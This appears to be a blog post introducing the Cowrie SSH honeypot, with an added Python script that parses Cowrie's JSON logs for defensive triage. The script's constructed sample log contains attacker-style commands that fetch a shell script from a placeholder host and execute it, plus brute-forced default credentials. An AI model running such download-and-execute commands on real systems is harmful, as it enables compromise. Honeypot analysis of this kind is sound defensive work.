Cowrie, written by Michel Oosterhof, is a medium interaction SSH honeypot designed to log brute force attacks and the shell interactions performed by attackers. (Sounds familiar? Yes, it is a fork of Kippo.)
The aim of this blog post is just a quick glimpse into Cowrie: a brief feel for what handling Cowrie is like, what the deployment process involves, and so on.
Everything you need is in the Github Repo
Michel did a very good job explaining what Cowrie is all about, how to set it up, and so on; it is all pretty much self-contained in the Github repo (https://github.com/micheloosterhof/cowrie).
Very similar to Kippo
If you’re already familiar with Kippo, you’ll be very comfortable with Cowrie. It also has many additional features on top of Kippo which I’ve yet to play with:
SFTP and SCP support for file upload;
Support for SSH exec command;
Logging of direct-TCP connection attempts (SSH proxying);
Logging in JSON format for easy processing in log management solutions; and
Many, many additional commands.
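The JSON logging is the feature that matters most once the honeypot is actually catching something, so here is an added example of processing it offline. This is not code from the Cowrie project or from Michel; it assumes the newline-delimited JSON layout Cowrie writes to its log file and the event names cowrie.login.failed, cowrie.login.success, cowrie.command.input and cowrie.session.file_download, and the log lines embedded in it are constructed for illustration, not captured from a live sensor.

```python
"""Summarise a Cowrie JSON log offline: who brute-forced, which credentials worked,
what each session ran, and what it downloaded.

Added example, not code from the Cowrie project. Assumes Cowrie's JSON-lines
log format (one event per line, each with an "eventid" field); the event names
and field names used below are an assumption about that format.
"""
import json
from collections import Counter, defaultdict

# Constructed sample log lines (not a real capture). The last line is deliberately
# not JSON, to show that a corrupt line must not abort processing of the rest.
SAMPLE_LOG = """\
{"eventid":"cowrie.session.connect","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","timestamp":"2016-01-10T12:00:00.000000Z","message":"New connection"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","username":"root","password":"123456","timestamp":"2016-01-10T12:00:01.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","username":"root","password":"password","timestamp":"2016-01-10T12:00:02.000000Z"}
{"eventid":"cowrie.login.success","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","username":"root","password":"toor","timestamp":"2016-01-10T12:00:03.000000Z"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","input":"wget http://203.0.113.5/x.sh","timestamp":"2016-01-10T12:00:05.000000Z"}
{"eventid":"cowrie.session.file_download","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","url":"http://203.0.113.5/x.sh","outfile":"dl/ab12cd34","shasum":"ab12cd34","timestamp":"2016-01-10T12:00:06.000000Z"}
{"eventid":"cowrie.command.input","src_ip":"198.51.100.23","session":"a1b2c3d4e5f6","input":"chmod +x x.sh; ./x.sh","timestamp":"2016-01-10T12:00:07.000000Z"}
{"eventid":"cowrie.login.failed","src_ip":"192.0.2.77","session":"0f0f0f0f0f0f","username":"admin","password":"admin","timestamp":"2016-01-10T12:01:00.000000Z"}
this line is not JSON and should be skipped
"""


def parse_events(text):
    """Parse newline-delimited JSON into a list of event dicts.

    Lines that are blank, not valid JSON, or not objects carrying an "eventid"
    are skipped rather than raising: a honeypot log is attacker-influenced
    input and one bad line must not stop the report.
    """
    events = []
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        try:
            obj = json.loads(line)
        except json.JSONDecodeError:
            continue
        if isinstance(obj, dict) and "eventid" in obj:
            events.append(obj)
    return events


def summarise(events):
    """Aggregate the events that matter for triage."""
    failed_by_ip = Counter()      # brute-force volume per source address
    credentials = Counter()       # (username, password) pairs tried and failed
    successful = []               # (src_ip, username, password) that got a shell
    commands = defaultdict(list)  # session id -> commands typed, in order
    downloads = []                # (src_ip, url, shasum) of files fetched into the honeypot
    for ev in events:
        eid = ev.get("eventid")
        ip = ev.get("src_ip", "?")
        if eid == "cowrie.login.failed":
            failed_by_ip[ip] += 1
            credentials[(ev.get("username"), ev.get("password"))] += 1
        elif eid == "cowrie.login.success":
            successful.append((ip, ev.get("username"), ev.get("password")))
        elif eid == "cowrie.command.input":
            commands[ev.get("session")].append(ev.get("input", ""))
        elif eid == "cowrie.session.file_download":
            downloads.append((ip, ev.get("url"), ev.get("shasum")))
    return {
        "failed_by_ip": failed_by_ip,
        "credentials": credentials,
        "successful": successful,
        "commands": dict(commands),
        "downloads": downloads,
    }


def render(summary):
    """Produce a short plain-text report from summarise()'s output."""
    lines = ["Failed logins by source IP:"]
    for ip, n in summary["failed_by_ip"].most_common():
        lines.append(f"  {ip}: {n}")
    lines.append("Successful logins (src_ip, user, password):")
    for entry in summary["successful"]:
        lines.append(f"  {entry}")
    lines.append("Commands per session:")
    for session, cmds in summary["commands"].items():
        lines.append(f"  {session}:")
        lines.extend(f"    $ {c}" for c in cmds)
    lines.append("Downloads (src_ip, url, shasum):")
    for entry in summary["downloads"]:
        lines.append(f"  {entry}")
    return "\n".join(lines)


if __name__ == "__main__":
    print(render(summarise(parse_events(SAMPLE_LOG))))
```

To run it against a real sensor, feed the contents of Cowrie's JSON log file into parse_events instead of SAMPLE_LOG; the shasum of each download is what you would pivot on to find the same payload across sessions and sensors.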
Is it secure?
Michel directed this question to the FAQ of Kippo: https://github.com/desaster/kippo/wiki/FAQ.
“Kippo is written in Python, and doesn’t call any external software, so it’s probably somewhat secure. Kippo has not had any real security audit done on it, and it’s definitely vulnerable to some DoS attacks (no limits on how many people can connect to it, or how many files they can download). It’s recommended to run Kippo in a well firewalled virtual machine.”
This is a really quick glimpse at Cowrie. It’s very easy to set up, and it looks very promising. I’ll do my best to find time to experiment with all the cool features written by Michel, and hopefully I’ll be able to do a more detailed write-up of Cowrie soon. So, stay tuned!
Here are some screenshots:
Running Cowrie on port 2222. ifconfig reflects the correct IP address.
curl
wget
wget item remains in the fake filesystem.